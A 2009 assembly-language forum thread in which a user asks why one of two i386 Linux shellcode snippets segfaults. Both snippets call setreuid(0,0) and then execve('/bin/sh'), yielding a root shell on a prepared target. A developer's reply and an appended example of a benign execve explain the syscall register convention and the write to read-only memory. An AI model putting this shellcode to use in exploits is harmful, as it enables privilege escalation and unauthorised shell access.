Topic: syscall description in detail

nobody (Guest)
syscall description in detail
« on: February 25, 2009, 09:49:02 PM »
Hello,

To learn more not only about NASM but also about the fundamental principles of the whole system and of C and NASM together, I've been working with shellcode for a few weeks.
But that's not actually the problem I've got. The main problem is to understand why and when I get segmentation faults after successfully compiling and linking.

Let me show what I mean:

; The following example works fine after I've changed a few lines:

BITS 32

; setreuid (uid_t ruid, uid_t euid)
xor eax,eax
mov al,70          ; eax = 70 = __NR_setreuid (i386)
xor ebx,ebx        ; ruid = 0
xor ecx,ecx        ; euid = 0
int 0x80

; execve (const char *filename, char *const arg[], char *const envp[])
jmp short two
one:
pop ebx            ; ebx = address of '/bin/sh' (pushed by the call below)
xor eax,eax
push eax           ; argv[1] = NULL
mov al,11          ; eax = 11 = __NR_execve
xor edx,edx        ; envp = NULL
push ebx           ; argv[0] = address of '/bin/sh'
mov ecx,esp        ; ecx = argv (the two dwords just pushed)

int 0x80

two:
call one           ; pushes the address of the string below, then jumps to one
db '/bin/sh'       ; no NUL terminator here: relies on whatever byte follows in memory

--------------------------------------------------------------

I get a shell, and if prepared, it's a root shell.

But the next example doesn't work: I get a segmentation fault.

----------------------------------------------------------------------

BITS 32

; setreuid (uid_t ruid, uid_t euid)
xor eax,eax
mov al,70          ; eax = 70 = __NR_setreuid (i386)
xor ebx,ebx        ; ruid = 0
xor ecx,ecx        ; euid = 0
int 0x80

; execve (const char *filename, char *const arg[], char *const envp[])

jmp short two
one:
pop ebx            ; ebx = address of the string below

xor eax,eax
mov [ebx+7],al     ; overwrite the 'X' with NUL: terminates "/bin/sh"
mov [ebx+8],ebx    ; overwrite 'AAAA' with the string address: argv[0]
mov [ebx+12],eax   ; overwrite 'BBBB' with NULL: argv[1]
mov al,11          ; eax = 11 = __NR_execve
lea ecx,[ebx+8]    ; ecx = argv (built in place, inside the string)
lea edx,[ebx+12]   ; edx = envp (points at the NULL dword)
int 0x80

two:
call one           ; pushes the address of the string below, then jumps to one
db '/bin/shXAAAABBBB'   ; the three stores above write into these bytes

----------------------------------------

The last one is especially described in one book as shellcode for working under Linux. I would only like to know why it doesn't work. It seems to me that (I read this in different books) it depends on how the stack and the registers are used. FreeBSD uses mainly the stack for arguments and Linux the registers.

I would like to know, how to use the registers right in combination with the stack.
Also, examples of how to use the syscalls with registers would be important to me. The syscall table I've got shows no more than headlines, and that is often not clear; even if I read the man pages, I often don't get a really useful answer.

For example: in my syscall list, execve is mentioned as one which gets the parameters only in ebx using a structure called pt_regs, but the other registers aren't mentioned, although one must use them (eax, ebx, ecx, edx) in order to execute the program right. And nothing is said about the stack and how many parameters can be used at all.

I would be happy for every helpful answer that makes it clearer to me.

Thanks
Michel

Frank Kotler

  • NASM Developer
Re: syscall description in detail
« Reply #1 on: February 26, 2009, 09:02:36 AM »
Shellcode is for script-kiddies. (IMO) Do you know any "legitimate" use for this crap?

The only difference I see between your two exploits is that you're writing to memory in the second. Are you injecting this vile slime into writeable memory? Trying to write read-only memory will segfault.

"pt_regs" sounds familiar. Phil's list? I think it just means "registers are what they are". The best asm-oriented documentation I've found is Jeff Owens' AsmRef:

http://www.linuxasmtools.net/

Includes examples of all(?) the system calls. (*legitimate* examples - not exploits!)

Best,
Frank
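An added example, not code from the thread, of the Linux i386 convention both posts are talking about: every syscall argument goes in a register, the stack is only used to build execve's argv[] array, and the strings live in a writable section so nothing has to be patched in .text. The file name, labels and build commands are my assumptions.

```nasm
; Added example, not from the thread: the Linux i386 syscall convention in a
; stand-alone program.  Assumed build: nasm -f elf32 demo.asm && ld -m elf_i386 -o demo demo.o
; eax = syscall number, ebx/ecx/edx/esi/edi/ebp = arguments 1..6, int 0x80 enters
; the kernel, and the result comes back in eax (a negative value is -errno).
; The kernel never reads arguments from the stack; the stack is used here only
; to build the argv[] array that execve's second register argument points to.

BITS 32

section .data                       ; writable, so it could be patched at run time
path    db '/bin/echo', 0           ; NUL-terminated: no run-time patching needed
arg1    db 'hello from execve', 0
msg     db 'execve failed', 10
msglen  equ $ - msg

section .text
global _start
_start:
    ; execve(const char *filename, char *const argv[], char *const envp[])
    ; Build argv[] on the stack, last element first, so esp ends at argv[0].
    xor  eax, eax
    push eax                        ; argv[2] = NULL terminator
    push dword arg1                 ; argv[1] -> "hello from execve"
    push dword path                 ; argv[0] -> "/bin/echo"
    mov  ecx, esp                   ; arg 2 (ecx): pointer to argv[]
    mov  ebx, path                  ; arg 1 (ebx): pointer to the filename
    xor  edx, edx                   ; arg 3 (edx): envp = NULL
    mov  eax, 11                    ; __NR_execve on i386
    int  0x80                       ; on success this never returns

    ; Reached only if execve failed; eax now holds -errno.
    ; write(1, msg, msglen): same convention, three register arguments.
    mov  eax, 4                     ; __NR_write
    mov  ebx, 1                     ; fd 1 = stdout
    mov  ecx, msg
    mov  edx, msglen
    int  0x80

    mov  eax, 1                     ; __NR_exit
    mov  ebx, 1                     ; exit status 1
    int  0x80

; Why the second snippet in the question faults: its stores to [ebx+7],
; [ebx+8] and [ebx+12] land in the bytes right after its own code, i.e. in
; section .text, which the kernel maps read-only.  The first store raises
; SIGSEGV.  The same instructions only work when the code and its string are
; placed in writable memory (a .data buffer or the stack).
```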